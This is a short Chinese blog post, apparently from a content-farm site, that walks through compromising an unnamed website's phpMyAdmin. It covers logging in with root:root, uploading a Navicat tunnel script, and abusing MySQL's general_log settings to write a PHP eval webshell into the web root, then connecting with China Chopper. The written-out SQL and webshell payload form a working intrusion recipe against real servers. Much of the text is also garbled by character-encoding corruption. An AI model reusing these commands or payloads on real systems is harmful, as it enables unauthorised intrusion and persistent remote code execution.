共計(jì) 942 個字符,預(yù)計(jì)需要花費(fèi) 3 分鐘才能閱讀完成。
自動寫代碼機(jī)器人,免費(fèi)開通
這篇文章給大家分享的是有關(guān) Phpmyadmin 滲透測試的示例的內(nèi)容。丸趣 TV 小編覺得挺實(shí)用的,因此分享給大家做個參考,一起跟隨丸趣 TV 小編過來看看吧。
首先通過目錄掃描對某站進(jìn)行掃描,發(fā)現(xiàn)存在 phpmyadmin,嘗試弱口令 root:root 很幸運(yùn)進(jìn)去了
嘗試使用 Navicate 進(jìn)行數(shù)據(jù)庫連接返回禁止遠(yuǎn)程連接數(shù)據(jù)庫:
但是遠(yuǎn)程命令執(zhí)行發(fā)現(xiàn)本地 3306 端口時開放的,于是嘗試通過代理進(jìn)行連接:
Navicat 安裝目錄下上傳 ntunnel_mysql.php 文件(數(shù)據(jù)庫的代理腳本)到目標(biāo)服務(wù)器任意 web 站點(diǎn)目錄(后面 getshell 后上傳的)
上傳到 D:/phpStudy/WWW 目錄進(jìn)行訪問 http://XXX/ntunnel_mysql.php 測試成功
進(jìn)行測試連接:
(此時, 在本地打開 Navicat 配置 http 連接, 這里的通道地址就寫你上面訪問的那個 url, 說白點(diǎn)兒就是個代理端, 勾上使用 base64 編碼, 防止 waf 從中作祟, 然后主機(jī)名寫 localhost, 賬號密碼寫 lnmp01 本地?cái)?shù)據(jù)庫用戶的賬號即可, 因?yàn)橐B接 lnmp01 本地的 mysql)
Phpmyadmin Get Shell:
利用日志文件
mysql 5.0 版本以上會創(chuàng)建日志文件,修改日志的全局變量,也可以 getshell。但是也要對生成的日志有可讀可寫的權(quán)限。
set global general_log = ON # 當(dāng)開啟 general 時,所執(zhí)行的 sql 語句都會出現(xiàn)在 WIN-30DFNC8L78A.log 文件那么,如果修改 general_log_file 的值,那么所執(zhí)行的 sql 語句就會對應(yīng)生成進(jìn)而 getshell
SET global general_log_file= D:/phpStudy/WWW/test1234.php # 對應(yīng)就會生成 test1234.php 文件
select ?php eval($_POST[2019]);? # 將一句話木馬寫入 test1234.php 文件
菜刀連接:
感謝各位的閱讀!關(guān)于“Phpmyadmin 滲透測試的示例”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!
向 AI 問一下細(xì)節(jié)
